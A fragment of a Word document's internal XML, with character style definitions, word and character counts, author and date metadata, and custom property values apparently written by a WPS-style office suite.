    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="Title Char"/>
    <w:link w:val="19"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun"/>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="5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6496</Words>
  <Characters>24780</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>31470</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2026-08-20T11:55:00Z</dcterms:created>
  <dc:creator>tien</dc:creator>
  <cp:lastModifiedBy>tien</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-26T18:58:50Z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id="40oTxDmR"/&gt;&lt;style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ProductBuildVer">
    <vt:lpwstr>1033-11.1.0.11723</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ICV">
    <vt:lpwstr>4843B458E87245A5951EC8D46C77DFB4_12</vt:lpwstr>
  </property>
</Properties>
</file>